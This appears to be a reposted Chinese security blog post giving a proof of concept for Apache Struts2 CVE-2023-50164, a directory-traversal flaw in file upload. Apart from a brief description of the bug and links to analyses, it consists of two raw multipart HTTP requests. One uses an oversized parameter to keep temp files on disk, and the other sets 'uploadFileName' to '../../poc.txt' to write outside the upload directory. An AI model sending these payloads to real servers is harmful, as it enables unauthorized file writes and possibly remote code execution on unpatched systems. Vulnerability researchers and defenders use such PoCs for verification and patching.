Apache Struts2 CVE-2023-50164 POC

Apache Struts2 CVE-2023-50164 POC
2023-12-13 11:39:51 Author: Ots安全(查看原文) 阅读量:20 收藏

Apache Struts2 CVE-2023-50164

漏洞描述里提到可通过伪造文件上传的参数导致目录穿越，看版本比对，有两个 Commit 引起我的关注，一个是 Always delete uploaded file，另一个是 Makes HttpParameters case-insensitive。前者的作用是确保上传的临时文件被正确上传，在修复之前，通过构造超长的文件上传参数可以让临时文件继续留存在磁盘中；

POC：

POST /s2_066_war_exploded/upload.action HTTP/1.1Host: localhost:8080Accept-Language: en-US,en;q=0.9User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brContent-Type: multipart/form-data; boundary=----WebKitFormBoundary5WJ61X4PRwyYKlipContent-Length: 593 ------WebKitFormBoundary5WJ61X4PRwyYKlipContent-Disposition: form-data; name="upload"; filename="poc.txt"Content-Type: text/plain test  ------WebKitFormBoundary5WJ61X4PRwyYKlipContent-Disposition: form-data; name="caption";  {{randstr(4097,4097)}} ------WebKitFormBoundary5WJ61X4PRwyYKlip--

POST /s2_066_war_exploded/upload.action HTTP/1.1Host: localhost:8080Accept-Language: en-US,en;q=0.9User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brContent-Type: multipart/form-data; boundary=----WebKitFormBoundary5WJ61X4PRwyYKlipContent-Length: 593 ------WebKitFormBoundary5WJ61X4PRwyYKlipContent-Disposition: form-data; name="upload"; filename="poc.txt"Content-Type: text/plain test  ------WebKitFormBoundary5WJ61X4PRwyYKlipContent-Disposition: form-data; name="uploadFileName"; ../../poc.txt ------WebKitFormBoundary5WJ61X4PRwyYKlip--

漏洞复现分析

https://trganda.github.io/notes/security/vulnerabilities/apache-struts/Apache-Struts-Remote-Code-Execution-Vulnerability-(-S2-066-CVE-2023-50164)

https://y4tacker.github.io/2023/12/09/year/2023/12/Apache-Struts2-%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E5%88%86%E6%9E%90-S2-066/

poc

感谢您抽出

来阅读本文

点它，分享点赞在看都在这里

文章来源: http://mp.weixin.qq.com/s?__biz=MzAxMjYyMzkwOA==&mid=2247503267&idx=1&sn=8e0dad24ba67dbc97ea0e05a4c5b1cc2&chksm=9af0c50e42ad17b6551b0839a518fe125e506f88920ebe98b389d28a7d16cefd53291bf672ca&scene=0&xtrack=1#rd
如有侵权请联系:admin#unsafe.sh